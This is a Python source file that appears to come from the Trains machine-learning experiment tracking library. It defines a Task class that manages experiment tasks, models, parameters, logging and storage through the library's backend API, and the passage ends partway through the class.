task.py
""" Backend task management support """
import itertools
import logging
import os
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from threading import Thread
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config, PROC_MASTER_ID_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_store_diff = config.get('development.store_uncommitted_code_diff', False)
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
training = 'training'
testing = 'testing'
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
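Example (a minimal sketch; the project and task names are hypothetical and a configured backend session is assumed):
.. code-block:: py
task = Task(project_name='examples', task_name='backend task demo')
print(task.id, task.status)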
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib3 is never in debug/info
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to the root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate, our records would be caught by the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
else:
StorageHelper._test_bucket_config(conf=conf, log=self.log, raise_on_error=raise_errors)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'TRAINS new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (lest someone else
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
self._set_storage_uri(value)
@property
def task_id(self):
return self.id
@property
def name(self):
return self.data.name or ''
@name.setter
def name(self, value):
self.set_name(value)
@property
def task_type(self):
return self.data.type
@property
def project(self):
return self.data.project
@property
def parent(self):
return self.data.parent
@property
def input_model_id(self):
return self.data.execution.model
@property
def output_model_id(self):
return self.data.output.model
@property
def comment(self):
return self.data.comment or ''
@comment.setter
def comment(self, value):
self.set_comment(value)
@property
def cache_dir(self):
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
"""
The Task's status. To keep the Task updated, Trains reloads the Task information when this value
is accessed.
"""
self.reload()
return self._status
@property
def _status(self):
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False):
return Model(
session=self.session,
model_id=None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
"""
Returns a simple metrics reporter instance
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
""" Reload the task object from the backend """
with self._edit_lock:
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
self.reload()
def started(self, ignore_errors=True):
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest'):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, storing the weights file locally and specifying a ``file://path/to/file`` URI.
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
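Example (an illustrative sketch; the local weights path and model name are hypothetical):
.. code-block:: py
task.update_output_model('file:///tmp/model_weights.bin', name='my model')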
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self, model_file, name=None, comment=None, tags=None, async_enable=False, cb=None, iteration=None):
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload()`` method),
then Trains updates the model object associated with the Task in an API call. The API call uses the URI
of the uploaded file, and other values provided by additional arguments.
:param model_file: The path to the updated model weights file.
:type model_file: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
:param async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(Default)
:type async_enable: bool
:param cb: Asynchronous callback. If ``async_enable`` is set to ``True``, this callback is invoked once the
asynchronous upload and update complete.
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``, this is the expected URI,
as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
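Example (an illustrative sketch; the model name is hypothetical):
.. code-block:: py
task.set_input_model(model_name='resnet50 baseline')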
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto-populate input fields from the model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
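Example (an illustrative sketch; parameter names and values are arbitrary):
.. code-block:: py
task.set_parameters({'lr': 0.01, 'batch_size': 32}, epochs=10)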
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
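Example (illustrative only):
.. code-block:: py
task.set_parameter('epochs', 30)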
"""
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: Parameter value (or default value if parameter is not defined)
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
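Example (an illustrative sketch; labels and ids are arbitrary):
.. code-block:: py
task.set_model_label_enumeration({'background': 0, 'person': 1})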
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
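Example (an illustrative sketch; the image name is hypothetical):
.. code-block:: py
task.set_base_docker('nvidia/cuda:10.1-runtime-ubuntu18.04')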
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
"""
Set the list of artifacts (tasks.Artifact) to be registered on the Task.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts_list to be a list of tasks.Artifact objects')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
"""
Get the label enumeration dictionary of string (label) to integer (value) pairs.
:return: dict
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
"""
Get the model configuration as a blob of text.
:return: The model configuration text.
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# fixed seed for the time being
pass
def set_project(self, project_id):
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
return self._get_task_property("tags")
def set_system_tags(self, tags):
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_tags(self, tags):
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_comment(self, comment):
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: newly set initial offset
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
:rtype: int
"""
return self._initial_iteration_offset
def _get_models(self, model_type='output'):
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
try:
# make sure the model is valid
m._get_model_data()
in_model.append(m)
except:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
@classmethod
def _get_api_server(cls):
return Session.get_api_server_host()
def _get_app_server(self):
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
with self._edit_lock:
# Since we are using forced update, make sure the task status is valid
if not self._data or (str(self.data.status) not in (str(tasks.TaskStatusEnum.created),
str(tasks.TaskStatusEnum.in_progress))):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection: old API might not support it
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(cls, cloned_task_id, name=None, comment=None, execution_overrides=None,
tags=None, parent=None, project=None, log=None, session=None):
"""
Clone a task
:param cloned_task_id: Task ID for the task to be cloned
:type cloned_task_id: str
:param name: Name for the new task
:type name: str
:param comment: Optional comment for the new task
:type comment: str
:param execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:type execution_overrides: dict
:param tags: Optional tags for the new task
:type tags: [str]
:param parent: Optional parent Task ID of the new task.
:type parent: str
:param project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:type project: str
:param log: Log object used by the infrastructure.
:type log: logging.Logger
:param session: Session object used for sending requests to the API
:type session: Session
:return: The new task's ID
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all output artifacts, keeping only artifacts with mode == 'input'
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment or task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
"""
List all the Tasks based on specific projection.
:param session: The session object used for sending requests to the API.
:type session: Session
:param log: The Log object.
:type log: logging.Logger
:param kwargs: Keyword args passed to the GetAllRequest (see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: py
status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
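# The edit lock below is process-aware: when PROC_MASTER_ID_ENV_VAR marks this task as the master
# process' task, a file-based lock in the temp dir is used so subprocesses can safely edit the same
# task; otherwise a plain in-process RLock is sufficient.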
@property
def _edit_lock(self):
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
# remove previous file lock instance, just in case.
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
try:
os.unlink(filename)
except Exception:
pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
